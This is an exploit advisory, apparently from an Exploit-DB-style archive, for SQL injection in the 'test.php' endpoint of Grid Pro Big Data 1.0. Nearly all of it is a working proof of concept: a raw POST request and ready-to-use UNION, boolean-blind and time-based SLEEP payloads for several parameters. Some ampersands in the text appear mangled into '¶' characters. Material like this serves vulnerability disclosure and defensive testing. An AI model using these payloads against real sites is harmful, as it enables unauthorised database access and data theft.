# Exploit Title: Grid Pro Big Data 1.0 - 'test.php' SQL Injection # Dork: N/A # Date: 30.05.2018 # Exploit Author: Kağan Çapar # Vendor Homepage: https://codecanyon.net/item/grid-pro-big-data-table-view-data-grid-with-sort-search-and-filter-for-large-mysql-tables/20395348 # Version: 1.0 # Category: Webapps # Tested on: Kali Linux # Description : The multiple parameters in the 'test.php' query contain SQLi vulnerabilities. ==================================================== # PoC : SQLi : POST /release/pro_grid_big_data/php/test.php HTTP/1.1 Host: site.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://site.com/release/pro_grid_big_data/index.html Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 430 Connection: keep-alive page=1&on_home=5&table_name=be¶ms%5B0%5D%5Btype%5D=text¶ms%5B0%5D%5Bvalue%5D=¶ms%5B0%5D%5Bname%5D=Name¶ms%5B1%5D%5Btype%5D=text¶ms%5B1%5D%5Bvalue%5D=¶ms%5B1%5D%5Bname%5D=Surname¶ms%5B2%5D%5Btype%5D=num_range¶ms%5B2%5D%5Bvalue%5D%5B%5D=¶ms%5B2%5D%5Bvalue%5D%5B%5D=¶ms%5B2%5D%5Bname%5D=Age¶ms%5B3%5D%5Btype%5D=date¶ms%5B3%5D%5Bvalue%5D=¶ms%5B3%5D%5Bname%5D=Born_date&ordering=none Parameter: on_home (POST) Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: page=2&on_home=5 UNION ALL SELECT CONCAT(CONCAT('qjbqq','vVWAgYsZnIsAkqERYDgZibFieBTaDlfAymtKvnaO'),'qxbpq'),NULL,NULL,NULL-- LEgG&table_name=be¶ms[0][type]=text¶ms[0][value]=¶ms[0][name]=Name¶ms[1][type]=text¶ms[1][value]=¶ms[1][name]=Surname¶ms[2][type]=num_range¶ms[2][value][]=¶ms[2][value][]=¶ms[2][name]=Age¶ms[3][type]=date¶ms[3][value]=¶ms[3][name]=Born_date&ordering=none Parameter: params[0][value] (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=2&on_home=5&table_name=be¶ms[0][type]=text¶ms[0][value]=%' AND 1906=1906 AND '%'='¶ms[0][name]=Name¶ms[1][type]=text¶ms[1][value]=¶ms[1][name]=Surname¶ms[2][type]=num_range¶ms[2][value][]=¶ms[2][value][]=¶ms[2][name]=Age¶ms[3][type]=date¶ms[3][value]=¶ms[3][name]=Born_date&ordering=none Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: page=2&on_home=5&table_name=be¶ms[0][type]=text¶ms[0][value]=%' AND SLEEP(5) AND '%'='¶ms[0][name]=Name¶ms[1][type]=text¶ms[1][value]=¶ms[1][name]=Surname¶ms[2][type]=num_range¶ms[2][value][]=¶ms[2][value][]=¶ms[2][name]=Age¶ms[3][type]=date¶ms[3][value]=¶ms[3][name]=Born_date&ordering=none Parameter: params[0][name] (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: page=2&on_home=5&table_name=be¶ms[0][type]=text¶ms[0][value]=¶ms[0][name]=Name) AND SLEEP(5) AND (2977=2977¶ms[1][type]=text¶ms[1][value]=¶ms[1][name]=Surname¶ms[2][type]=num_range¶ms[2][value][]=¶ms[2][value][]=¶ms[2][name]=Age¶ms[3][type]=date¶ms[3][value]=¶ms[3][name]=Born_date&ordering=none ====================================================